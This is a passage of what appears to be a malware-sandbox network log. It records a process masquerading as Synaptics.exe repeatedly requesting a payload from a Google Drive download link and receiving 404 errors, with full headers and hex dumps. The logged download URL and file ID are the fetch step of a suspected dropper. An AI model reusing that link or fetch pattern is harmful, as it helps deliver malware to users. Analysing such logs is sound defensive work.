                                                                                                                      Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.649762142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:38 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-12-30 10:40:39 UTC1602INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC62M3jCQXortMmokBrUGlmUrsZKeo07pK8TwJB3waK_8GFoyabIjZXWvr6RqUF9Dr-fxIIkGhw
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:39 GMT
                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce--WplRxNcX56DZt7mI1z9dg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Set-Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-; expires=Tue, 01-Jul-2025 10:40:39 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:39 UTC1602INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 62 79 4c 75 78 50 5f 73 59 5a 31 39 34 57 79 2d 5f 2d 57 45 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LbyLuxP_sYZ194Wy-_-WEw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                      2024-12-30 10:40:39 UTC50INData Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.649760142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:38 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:39 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-fM769DfwX2mngRETQyFwYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.649774142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:39 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:39 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-14DxW1SlVmowf6uJQAmF5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.649775142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:39 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-12-30 10:40:40 UTC1595INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC6Rml3YnEOq65rDZjkua5UqhaROy1ATmupOuW1IFeKsAp_f2ugh5JJlr0nP00wV8mFm
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:40 GMT
                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-aAJppFj6bCC4l6Zf1EC6yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Set-Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7; expires=Tue, 01-Jul-2025 10:40:40 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:40 UTC1595INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 35 44 70 6b 63 4d 34 30 2d 4b 6d 44 32 4f 47 36 30 34 5f 75 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="N5DpkcM40-KmD2OG604_uQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                      2024-12-30 10:40:40 UTC57INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.649777142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:39 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:40 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-vhhz3Y1O67UX61vbLyznaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.649778142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:39 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=Yuz7RKwQEmloTaTTA976nrnkFQ7N5Ob3pnCam2NVZl0sB_Ud02smlILDTDMmhSw5alN9qYua8UwJYg8uP4GqMg-ydOrOsxWCz2mBh0SXqRIaBniutRP5BkN5ceAVzF4EhGF6V34nDgJ3XudT8SM4aVp_Cp4zGI-RnpiVAHIlijow4CMrQ_jiekk
                                                                                                                      2024-12-30 10:40:40 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC78uzettXvUXXFIJixkANh297TWjhG6OYsKypmDUqXiVOn_rOyo--t_-VaUr9nybv1V
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:40 GMT
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-EfxtQkcdyGYydNKYbQeA8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:40 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:40:40 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 66 31 63 6b 6f 6e 41 2d 73 30 34 50 6d 6a 72 30 65 4c 6c 44 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="Zf1ckonA-s04Pmjr0eLlDg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:40:40 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      10192.168.2.649787142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:40 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:40 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Ip84VHt9ogYlwDbpHJF3LA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      11192.168.2.649788142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:40 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:41 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-EQYbhFgl9iFIhH2iVtNjfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      12192.168.2.649789142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:40 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                                                                                                                      2024-12-30 10:40:41 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC7xEof4pDMmkxt_skBhEHWxQjELhKVQKgpdujZDIBk3nTAlTM0QS8DIBG8ZZ3b2QDJj
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:41 GMT
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-f52LIjg0UGkvyMRF-ahcfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
